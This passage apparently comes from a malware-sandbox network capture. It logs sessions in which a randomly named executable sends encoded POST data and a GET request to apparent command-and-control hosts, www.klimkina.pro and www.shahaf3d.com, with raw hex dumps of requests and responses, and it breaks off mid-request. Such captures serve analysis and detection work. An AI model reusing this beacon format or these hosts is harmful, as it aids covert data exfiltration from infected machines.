May 30, 2024 15:02:26.075643063 CEST	714	OUT	POST /4mpz/ HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.klimkina.pro Referer: http://www.klimkina.pro/4mpz/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 76 75 46 70 42 35 38 65 61 6b 4a 38 31 59 69 52 4e 56 63 30 4c 77 4f 66 6e 58 4c 76 79 6c 6b 42 37 59 61 68 74 2f 38 55 76 50 2f 53 36 61 57 2f 64 75 41 33 62 30 61 72 42 47 36 37 69 31 37 66 56 48 78 58 62 43 63 30 6b 52 72 69 69 74 56 46 73 53 43 4c 73 4c 71 64 57 6c 6f 32 56 55 30 4f 76 76 4f 71 64 30 64 75 52 48 63 74 49 45 64 6e 6a 30 38 32 32 62 63 4a 43 71 37 70 57 66 54 38 78 76 77 57 53 73 73 45 43 6b 4a 77 6f 2f 52 41 68 6b 50 35 71 69 73 58 38 4b 62 2f 6e 7a 68 62 30 37 78 45 6e 2f 75 6b 4b 4e 79 47 58 6e 63 54 74 2b 6e 37 56 73 61 4f 4f 70 55 38 65 46 53 31 66 79 49 6d 73 57 37 33 59 32 6e 68 6b 68 4d 57 Data Ascii: I2ID3h=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvylkB7Yaht/8UvP/S6aW/duA3b0arBG67i17fVHxXbCc0kRriitVFsSCLsLqdWlo2VU0OvvOqd0duRHctIEdnj0822bcJCq7pWfT8xvwWSssECkJwo/RAhkP5qisX8Kb/nzhb07xEn/ukKNyGXncTt+n7VsaOOpU8eFS1fyImsW73Y2nhkhMW
May 30, 2024 15:02:26.859580994 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.0 Date: Thu, 30 May 2024 13:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID5=9356506cfd99b1a99c69d72c47da619f; expires=Sun, 30-Jun-2024 13:02:26 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: dd_bdfhyr=fcec6ab861b9f608541014f48f1d8d6b; expires=Fri, 31-May-2024 13:02:26 GMT; Max-Age=86400; path=/; secure; HttpOnly Server-version: 08 Content-Encoding: gzip Data Raw: 35 34 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 5f 8f db 44 10 7f 4e 3e c5 d4 3c 14 a4 ae 7d 7f ab eb 9d 13 89 b6 07 14 15 81 a0 3c a0 aa 42 1b 7b 1d ef 65 bd eb 7a d7 c9 05 f1 40 5b 81 00 21 21 f1 ce 43 bf c1 15 f5 0a 2d ed f1 15 ec 6f c4 ec da c9 a5 77 b9 5e 39 22 25 f6 ee ce cc ce cc fe e6 37 9b 30 e6 63 d0 66 2a 58 cf cb 69 1c 73 39 24 46 e5 db b0 b1 92 ef 7b fd 6e 37 0c 50 02 9f dd f0 d2 cd 4f 6f dc f9 ea b3 5d 48 4d 26 fa dd d0 3e 40 50 39 ec 79 4c a2 68 98 32 1a f7 bb 80 9f 30 63 86 a2 9c c9 09 bb 5f f2 71 cf bb a1 a4 61 d2 90 3b d3 9c 79 10 35 a3 9e 67 d8 be 09 ac a1 1d 88 52 5a 68 66 7a a5 49 c8 96 07 41 bf db 09 0d 37 82 f5 3f 64 e6 86 2a 71 11 08 ec 16 85 2a e0 26 4b 68 29 4c 18 34 02 28 e9 36 94 34 c3 30 c6 9c 4d 72 55 98 85 6d 26 3c 36 69 2f 66 63 1e 31 e2 06 57 80 4b 6e 38 15 44 47 14 83 5f f5 57 6c b4 9d f0 12 21 70 5b 51 9b 08 b8 ae 94 d1 a6 a0 39 10 62 dd 11 5c 8e 20 2d 58 d2 f3 82 bc 1c 08 1e 05 89 a0 86 94 3c 18 cc 44 83 48 eb e3 91 8f 23 0f 0a 26 7a 9e 4b b2 4e 19 33 a7 37 fa [TRUNCATED] Data Ascii: 54bW_DN><}<B{ez@[!!C-ow^9"%70cfXis9$F{n7POo]HM&>@P9yLh20c_qa;y5gRZhfzIA7?dq&Kh)L4(640MrUm&<6i/fc1WKn8DG_Wl!p[Q9b\ -X<DH#&zKN37o<yyF(;kEO%7\I}RgADY)}tS]Aqk]A%02D}!@W`2o-{uT.'7~4oX0+T/ExrBo@Vw8-ZJSU6}U__BS@SKHH"AD2d$\}aV?.W:EEK$
May 30, 2024 15:02:26.859612942 CEST	763	IN	Data Raw: d3 c2 33 72 46 a4 2a 32 ac d1 96 99 8e 2d b5 8c 15 73 9d 63 64 db 30 10 2a 1a ed 00 38 89 4e 98 ae cf 38 6d 2e c1 25 56 2f 23 ad 60 6b 70 1b d6 91 e6 1c d7 ed c0 40 15 31 2b b6 61 0b 67 b4 12 3c 86 77 d6 37 36 ae 6d ee 7a fd ea b7 ea a8 fa b3 7a Data Ascii: 3rF2-scd08N8m.%V/#`kp@1+ag<w76mzzUU:&dS'y~;~CA\_e\N~XWXh~C^<W9WOCCKx3G`QO;?!Pu!$&vKq3oMZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	185.137.235.125	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:28.614833117 CEST	1731	OUT	POST /4mpz/ HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.klimkina.pro Referer: http://www.klimkina.pro/4mpz/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 76 75 46 70 42 35 38 65 61 6b 4a 38 31 59 69 52 4e 56 63 30 4c 77 4f 66 6e 58 4c 76 79 6d 45 42 37 4c 53 68 74 59 6f 55 75 50 2f 53 35 61 57 79 64 75 41 6d 62 30 69 76 42 44 69 72 69 33 7a 66 55 6c 35 58 50 6d 77 30 75 52 72 69 75 4e 56 59 79 69 43 53 73 50 47 5a 57 6c 59 32 56 55 30 4f 76 70 4b 71 55 42 70 75 58 48 63 69 59 30 64 37 70 6b 38 65 32 62 30 5a 43 71 2f 35 52 72 76 38 78 50 67 57 65 2b 30 45 42 45 4a 79 74 2f 52 69 68 6b 44 69 71 69 77 78 38 4b 66 5a 6e 30 6c 62 30 4d 63 36 30 50 71 49 52 73 43 6d 64 56 45 4f 36 4f 37 6d 66 61 57 2f 45 4a 49 5a 52 6c 57 31 49 6b 70 71 34 6b 50 2b 43 6a 58 71 6b 56 6f 59 63 33 65 4f 43 45 4d 6b 64 54 59 66 45 4b 6b 54 6d 4d 48 47 45 76 5a 2f 39 52 34 77 32 7a 5a 56 35 41 4b 65 66 54 43 30 52 63 2b 4e 30 47 72 45 74 5a 34 68 37 72 44 79 6f 6e 64 6d 67 4d 4b 4b 44 63 7a 6c 4c 39 66 66 30 35 76 64 4d 39 76 49 6b 7a 65 74 32 73 31 30 34 61 47 4a 4b 6d 4f 68 35 6b 4f 4f 69 43 4e 72 43 50 76 35 76 52 6a [TRUNCATED] Data Ascii: I2ID3h=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvymEB7LShtYoUuP/S5aWyduAmb0ivBDiri3zfUl5XPmw0uRriuNVYyiCSsPGZWlY2VU0OvpKqUBpuXHciY0d7pk8e2b0ZCq/5Rrv8xPgWe+0EBEJyt/RihkDiqiwx8KfZn0lb0Mc60PqIRsCmdVEO6O7mfaW/EJIZRlW1Ikpq4kP+CjXqkVoYc3eOCEMkdTYfEKkTmMHGEvZ/9R4w2zZV5AKefTC0Rc+N0GrEtZ4h7rDyondmgMKKDczlL9ff05vdM9vIkzet2s104aGJKmOh5kOOiCNrCPv5vRjCZ2hzq3lnsL31p/2Dmb/OojJTE1CuavUmUjV+H1CUoQYJGZgwj/zbmkrcHGwT3x4DsGYtXyqcHXz6X2+J4DFP+ZL/G4zv6PmICuswmz7rMViMZavV0u9oQpPDajoH4D5FhgT7zfo/OpHrSmItDyYiKeQu0mIUtu4loFBHymMTY4Ku6IEUAA4Dunf2iWa4dnl4ObZhpLgUPTc0+TSnI8/NX5IloVKNCUbqakEkAD7TDNvikj6EZ4JGUkPsNJOEnqFT13rEWBHdqbpE7aVp49rk0m8XCiLi7fR3BnqDYNy8rb1o2500klYMzB3y2lmLAmdPPZavvY0jROGVJZdNG4NhV3o09HvC+Hbv6JwIjLAsHoBybwIdRd+kqlh1JCVPrYplbAShTs5PKkM15Q58/VAPXDtQcVAHewpzKiV1FdbSQwns4LZDKejroYsDDqOdSYlDes5Wh8ZHr1p+diA61YLC/Eq2/sdWscaWyOoHpATCEtwijTQhWnpUs6H31fBsoCTQ9BX++XaNECLFaUtUjZa8mTMbXK0/Q6Ei6gMB+q7sji0TOhAsaUJthUF74Wn3cs/+10JzoU9iwGuNFhaH3Ec0WUFeOxT0yil1ZdnIV7GJd0ZjSh2FTp1UlKr+xxcRCq5owLV/0/6mZrVlFlT1JYU3gVAP5PDORzrS9 [TRUNCATED]
May 30, 2024 15:02:29.431919098 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.0 Date: Thu, 30 May 2024 13:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID5=441fb0d6b2bab24301536bf64f3aa06a; expires=Sun, 30-Jun-2024 13:02:29 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: dd_bdfhyr=fcec6ab861b9f608541014f48f1d8d6b; expires=Fri, 31-May-2024 13:02:29 GMT; Max-Age=86400; path=/; secure; HttpOnly Server-version: 16 Content-Encoding: gzip Data Raw: 35 34 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 5f 8f db 44 10 7f 4e 3e c5 d4 3c 14 a4 ae 7d 7f ab eb 9d 13 89 b6 07 14 15 81 a0 3c a0 aa 42 1b 7b 1d ef 65 bd eb 7a d7 c9 05 f1 40 5b 81 00 21 21 f1 ce 43 bf c1 15 f5 0a 2d ed f1 15 ec 6f c4 ec da c9 a5 77 b9 5e 39 22 25 f6 ee ce cc ce cc fe e6 37 9b 30 e6 63 d0 66 2a 58 cf cb 69 1c 73 39 24 46 e5 db b0 b1 92 ef 7b fd 6e 37 0c 50 02 9f dd f0 d2 cd 4f 6f dc f9 ea b3 5d 48 4d 26 fa dd d0 3e 40 50 39 ec 79 4c a2 68 98 32 1a f7 bb 80 9f 30 63 86 a2 9c c9 09 bb 5f f2 71 cf bb a1 a4 61 d2 90 3b d3 9c 79 10 35 a3 9e 67 d8 be 09 ac a1 1d 88 52 5a 68 66 7a a5 49 c8 96 07 41 bf db 09 0d 37 82 f5 3f 64 e6 86 2a 71 11 08 ec 16 85 2a e0 26 4b 68 29 4c 18 34 02 28 e9 36 94 34 c3 30 c6 9c 4d 72 55 98 85 6d 26 3c 36 69 2f 66 63 1e 31 e2 06 57 80 4b 6e 38 15 44 47 14 83 5f f5 57 6c b4 9d f0 12 21 70 5b 51 9b 08 b8 ae 94 d1 a6 a0 39 10 62 dd 11 5c 8e 20 2d 58 d2 f3 82 bc 1c 08 1e 05 89 a0 86 94 3c 18 cc 44 83 48 eb e3 91 8f 23 0f 0a 26 7a 9e 4b b2 4e 19 33 a7 37 fa [TRUNCATED] Data Ascii: 54bW_DN><}<B{ez@[!!C-ow^9"%70cfXis9$F{n7POo]HM&>@P9yLh20c_qa;y5gRZhfzIA7?dq&Kh)L4(640MrUm&<6i/fc1WKn8DG_Wl!p[Q9b\ -X<DH#&zKN37o<yyF(;kEO%7\I}RgADY)}tS]Aqk]A%02D}!@W`2o-{uT.'7~4oX0+T/ExrBo@Vw8-ZJSU6}U__BS@SKHH"AD2d$\}aV?.W:EEK$
May 30, 2024 15:02:29.431941032 CEST	763	IN	Data Raw: d3 c2 33 72 46 a4 2a 32 ac d1 96 99 8e 2d b5 8c 15 73 9d 63 64 db 30 10 2a 1a ed 00 38 89 4e 98 ae cf 38 6d 2e c1 25 56 2f 23 ad 60 6b 70 1b d6 91 e6 1c d7 ed c0 40 15 31 2b b6 61 0b 67 b4 12 3c 86 77 d6 37 36 ae 6d ee 7a fd ea b7 ea a8 fa b3 7a Data Ascii: 3rF2-scd08N8m.%V/#`kp@1+ag<w76mzzUU:&dS'y~;~CA\_e\N~XWXh~C^<W9WOCCKx3G`QO;?!Pu!$&vKq3oMZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49724	185.137.235.125	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:31.154627085 CEST	438	OUT	GET /4mpz/?I2ID3h=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VugnDmL18sFLFtZPCU1s7f3MGpNHQZhMMTSljGkpJqnZygw==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:02:31.936499119 CEST	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.20.0 Date: Thu, 30 May 2024 13:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: http://klimkina.pro/4mpz/?I2ID3h=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VugnDmL18sFLFtZPCU1s7f3MGpNHQZhMMTSljGkpJqnZygw==&aN6=3TWTWTzxVTU X-XSS-Protection: 1 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49725	64.46.118.35	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:37.254955053 CEST	694	OUT	POST /0a9p/ HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.shahaf3d.com Referer: http://www.shahaf3d.com/0a9p/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 69 33 49 78 4a 46 63 35 4a 2b 50 69 48 4c 55 76 69 30 73 30 4d 31 47 59 6e 37 2f 2f 50 44 4c 41 35 70 30 76 73 6a 48 6b 55 46 6d 6c 6f 74 63 47 36 4f 51 46 30 42 61 56 68 63 6e 71 4b 45 51 61 41 38 61 4f 67 46 2b 2b 56 41 34 44 2f 38 30 4e 43 56 37 42 43 57 6b 74 6c 45 4d 4b 70 6a 50 4e 33 36 6c 71 35 42 2f 31 6e 74 64 59 30 5a 6b 56 63 48 78 78 30 6f 42 4f 55 33 63 38 64 65 70 36 66 74 57 38 4e 34 6c 33 31 77 4e 50 58 38 77 44 5a 53 66 38 54 4b 64 6b 4a 62 4b 54 4e 54 50 43 35 79 6b 4a 53 6b 2b 45 66 36 48 39 66 64 7a 31 43 4a 6a 76 44 71 6d 55 61 38 34 3d Data Ascii: I2ID3h=Y+MoCjqFkfVpi3IxJFc5J+PiHLUvi0s0M1GYn7//PDLA5p0vsjHkUFmlotcG6OQF0BaVhcnqKEQaA8aOgF++VA4D/80NCV7BCWktlEMKpjPN36lq5B/1ntdY0ZkVcHxx0oBOU3c8dep6ftW8N4l31wNPX8wDZSf8TKdkJbKTNTPC5ykJSk+Ef6H9fdz1CJjvDqmUa84=
May 30, 2024 15:02:38.476325989 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: afb_HTTP.404 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 30 May 2024 13:02:38 GMT server: LiteSpeed Data Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f da ea 3f 77 55 07 f9 19 7a 31 cc b3 6c b3 f4 66 30 3d eb d2 b3 ad 3d c2 ba 60 f5 c8 92 9e 24 03 fe 14 55 3f c8 7f 10 64 ff de b5 5e 21 2b 94 ad f0 49 26 62 ef 3e 21 4e 26 39 da db 4f 84 6d 15 d3 f3 55 0a 00 85 ac 91 ad b1 15 aa 8f 31 bd af 9d 94 a3 88 40 ad 6c 26 46 c0 45 e6 07 d1 41 34 ab 43 a3 06 b0 7a a3 b2 47 9a 7d fa d0 9b 1f 44 00 b0 87 38 fe cd ae 1b dc 50 38 68 fe 52 4f a1 ec 6d 09 9e 4e 53 43 f3 86 ca 9e 08 f9 f5 88 84 6d ab 07 94 04 75 4a b0 f9 f7 c6 cc 57 5c 51 39 ec 11 e5 c6 04 36 68 5f fb c3 e3 b7 60 6c de 8e 0f fb f0 ec fe b3 fb 4f 30 7e b4 43 33 05 b3 01 8b bf cf 43 a3 2b 47 81 30 7e 84 6b 27 75 90 7a 85 27 ad 52 1d 9e eb 40 2b c7 03 09 bc 37 0b 13 64 85 0f 9d 0f d4 f8 5e 36 3f 18 91 6a a2 59 01 4d ce d2 38 28 8c f3 26 58 19 b3 52 64 55 eb 49 64 e9 d4 1a 66 df 98 16 49 3e 87 af c9 f4 67 b1 a0 41 33 b8 75 0a fc 37 a9 0e c1 fa 22 cb 7c cd 6b be 1c 8b b4 32 0d 81 36 a1 e5 c1 cd 62 7a d3 43 16 13 e5 4a a2 cb ce 36 96 01 bd 6e d6 5a 65 b8 f0 d9 28 1f 8d b3 [TRUNCATED] Data Ascii: c34?wUz1lf0==`$U?d^!+I&b>!N&9OmU1@l&FEA4CzG}D8P8hROmNSCmuJW\Q96h_`lO0~C3C+G0~k'uz'R@+7d^6?jYM8(&XRdUIdfI>gA3u7"\|k26bzCJ6nZe("m1VA4H]cQX\Tmpb'Yv+~y`o5FXAgOYM7F3=$a6C?t6 oToNeN}J{]"o}Z)j!lr4NAR54:Ter+}V_I?\|vyr$v)so6$kIA<;;f,mA^$AmpCpL 6{BbZN1<h ~bt?&Np4"nsz'$Oi/HB!=j,94/\|,E6++2xEQi'j.oXibCJVjT_I}hzh1`7N&w
May 30, 2024 15:02:38.476411104 CEST	224	IN	Data Raw: 97 fb a5 71 27 e7 91 50 7a 58 67 67 f5 a6 92 5c 31 25 7d 48 9b 4c 70 2e 8e 0e 96 c2 ad 81 b0 cf 8a da ac c9 89 b4 02 07 78 80 5f 2f 67 ff 54 4a 16 da 84 7e a1 b8 0f cc 2c 59 e8 2c 0d 8a 62 cc d1 ba 86 e6 51 21 51 22 2e 07 b3 0d 3d cf 14 58 ec ec Data Ascii: q'PzXgg\1%}HLp.x_/gTJ~,Y,bQ!Q".=XcM(r)rQ%5m'im` GT_2_ZQo_8gbD=`ezDtcPwD9x\|m\ GjqrTq
May 30, 2024 15:02:38.476496935 CEST	1236	IN	Data Raw: 9a b3 05 17 2b c2 6e cc 2e 8b a1 8d 26 b7 10 72 c9 f2 c2 c9 55 0f 4f 80 df e4 70 25 ac 63 3b 6a 8e c1 4e 9f 5e 90 5b 4b dc 71 5d 51 81 14 d6 54 03 e9 e7 0a c2 85 13 05 de ae bc 0e 10 32 03 e9 09 91 4b 69 6b a5 23 c1 8a ac 0e a6 19 50 f7 ca 0b 82 Data Ascii: +n.&rUOp%c;jN^[Kq]QT2Kik#Pw2_sa6Oq1,9"-%!H<p_Ug>eoaD%7&!(+.~Up'fKj.Z20Er\|j,d<dk\LqI)\q\7X
May 30, 2024 15:02:38.476510048 CEST	817	IN	Data Raw: 1f ca 02 d6 09 28 9c 63 88 ab c2 d9 b3 e1 2f 14 88 69 2b f4 b5 d9 5c 33 8e 0e 73 c4 ba b6 ed 67 19 5c 4b 94 52 aa d1 68 6a 22 88 3c b3 46 7f e7 64 77 f1 c1 f2 62 26 9a 1b 6d 47 89 6d 3e de 9a 3b f0 5b be fd 62 3f 39 25 99 64 a3 22 46 d3 67 65 e7 Data Ascii: (c/i+\3sg\KRhj"<Fdwb&mGm>;[b?9%d"Fge\|S`YjbzLQ[vlNTm,N#<v`7,*sP"%lS9A0I#(n<+uvy%WE6-J_KUd3U ~
May 30, 2024 15:02:38.481194973 CEST	11	IN	Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49726	64.46.118.35	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:39.788191080 CEST	714	OUT	POST /0a9p/ HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.shahaf3d.com Referer: http://www.shahaf3d.com/0a9p/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 77 47 34 78 4f 69 6f 35 49 65 50 74 62 37 55 76 6f 55 73 77 4d 31 4b 59 6e 36 37 4a 50 78 76 41 35 4a 45 76 74 69 48 6b 58 46 6d 6c 6e 4e 63 44 6b 2b 51 4f 30 41 6d 64 68 5a 6e 71 4b 45 45 61 41 2b 79 4f 67 53 4b 39 56 51 34 42 33 63 30 50 4d 31 37 42 43 57 6b 74 6c 45 49 6b 70 6a 33 4e 33 4c 56 71 6f 51 2f 79 72 4e 64 66 7a 5a 6b 56 4e 58 78 31 30 6f 42 38 55 32 51 57 64 61 5a 36 66 73 6d 38 4d 70 6c 77 2b 77 4e 4a 59 63 78 54 49 48 71 50 5a 61 31 72 41 59 33 58 55 51 6e 50 38 45 4a 6a 49 47 32 73 4d 61 72 46 50 4f 37 43 54 35 43 47 5a 4a 32 6b 45 72 73 65 69 7a 2f 68 44 6d 66 66 65 62 78 53 6d 77 64 6b 76 77 2f 37 Data Ascii: I2ID3h=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxvA5JEvtiHkXFmlnNcDk+QO0AmdhZnqKEEaA+yOgSK9VQ4B3c0PM17BCWktlEIkpj3N3LVqoQ/yrNdfzZkVNXx10oB8U2QWdaZ6fsm8Mplw+wNJYcxTIHqPZa1rAY3XUQnP8EJjIG2sMarFPO7CT5CGZJ2kErseiz/hDmffebxSmwdkvw/7
May 30, 2024 15:02:41.005680084 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: afb_HTTP.404 content-type: text/html; charset=UTF-8 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache; private x-litespeed-cache-control: no-cache transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 30 May 2024 13:02:40 GMT server: LiteSpeed Data Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f da ea 3f 77 55 07 f9 19 7a 31 cc b3 6c 43 d3 9b c1 f4 ac 0b b3 ad 3d c2 ba 60 f5 c8 92 9e 24 03 fe 14 55 3f c8 7f 10 64 ff de b5 5e 21 2b 94 ad f0 49 26 62 ef 3e 21 4e 26 39 da db 4f 84 6d 15 d3 f3 55 0a 00 85 ac 91 ad b1 15 aa 8f 31 bd af 9d 94 a3 88 40 ad 6c 26 46 c0 45 66 07 d1 41 34 ad 43 a3 06 b0 7a a3 b2 47 9a 7d fa d0 9b 1d 44 00 b0 87 38 fe cd ae 1b dc 50 38 68 fe 52 4f a1 ec 6d 09 9e 4e 53 43 f3 86 ca 9e 08 f9 f5 88 84 6d ab 07 94 04 75 4a b0 f9 f7 c6 cc 57 5c 51 39 ec 11 e5 c6 04 36 68 5f fb c3 e3 b7 60 6c d6 8e 0f fb f0 ec fe b3 fb 4f 70 fa 68 87 66 0a 66 03 16 7f 9f 87 46 57 8e 02 e1 f4 11 e6 4e ea 20 f5 0a 4f 5a a5 3a 3c d7 81 56 8e 07 12 78 6f 16 26 c8 0a 1f 3a 1f a8 f1 bd 6c 76 30 22 d5 44 b3 02 9a 9c a5 71 50 18 e7 4d b0 32 66 a5 c8 aa d6 93 c8 d2 a9 35 cc be 31 2d 92 7c 0e 5f 93 e9 cf 62 41 83 66 70 eb 14 f8 6f 52 1d 82 f5 45 96 f9 9a d7 7c 79 2a d2 ca 34 04 da 84 96 07 37 8b e9 4d 0f 59 4c 94 2b 89 2e 3b db 58 06 f4 ba 59 6b 95 e1 c2 67 a3 7c 74 9a [TRUNCATED] Data Ascii: c34?wUz1lC=`$U?d^!+I&b>!N&9OmU1@l&FEfA4CzG}D8P8hROmNSCmuJW\Q96h_`lOphffFWN OZ:<Vxo&:lv0"DqPM2f51-\|_bAfpoRE\|y47MYL+.;XYkg\|ti`UD3d0!)\!\EE`P6wANn(ve2\7AZ^I^Xct5yc4SNf;\q:LoJfTTg H:/2X(oq!o8\KOuX&WxnL~]yA\|M38<Oy~OT<H{!YK7Yg4U`aDHm"mwk$]f3qk9fGNi8G`aR4I}L{A9vUcYyuh1F]Tpx_Cg)_X^Y+H{?Q{G ?NpN\|cO'TVF;M8WRJ@E]q70
May 30, 2024 15:02:41.005698919 CEST	1236	IN	Data Raw: bd dc 2f 8d 3b 39 8f 84 d2 c3 3a 3b ab 37 95 e4 8a 29 e9 43 da 64 82 73 71 74 b0 14 6e 0d 84 7d 56 d4 66 4d 4e a4 15 38 c0 03 fc 7a 39 fb a7 52 b2 d0 26 f4 0b c5 7d 60 66 c9 42 67 69 50 14 63 8e d6 35 34 8f 0a 89 12 71 39 98 6d e8 79 a6 c0 62 67 Data Ascii: /;9:;7)Cdsqtn}VfMN8z9R&}`fBgiPc54q9mybg_\|E!c7-O){}-qO&h;WNmSfeI=JzOpxq>./GLh+v)K4)PALJ7uwoH((Z[Va+G9[p"hr!,/
May 30, 2024 15:02:41.005712032 CEST	1041	IN	Data Raw: c5 f5 2c 6f 78 43 b8 53 96 88 67 3c 65 d6 6a 6f 15 f7 75 0c 41 52 cd bf ce f5 4a fa 90 72 21 fa b1 ea fa c8 82 81 b3 f3 b5 30 a2 cb 66 b7 e7 98 7c 81 89 48 2b 9b b3 f6 51 88 aa ba f4 d0 67 61 eb 94 5b 9f 2d 31 ac 94 ad a5 90 4d 8c f9 d1 6f fd f5 Data Ascii: ,oxCSg<ejouARJr!0f\|H+Qga[-1Moy:3O_\|MoW8PVtKOm0&JV8~\xWJRRc8rA3U 0$+c:~(X'p!gP
May 30, 2024 15:02:41.009829998 CEST	11	IN	Data Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49727	64.46.118.35	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:42.319205046 CEST	1731	OUT	POST /0a9p/ HTTP/1.1 Host: www.shahaf3d.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.shahaf3d.com Referer: http://www.shahaf3d.com/0a9p/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 77 47 34 78 4f 69 6f 35 49 65 50 74 62 37 55 76 6f 55 73 77 4d 31 4b 59 6e 36 37 4a 50 78 6e 41 35 36 4d 76 72 42 2f 6b 57 46 6d 6c 75 74 63 43 6b 2b 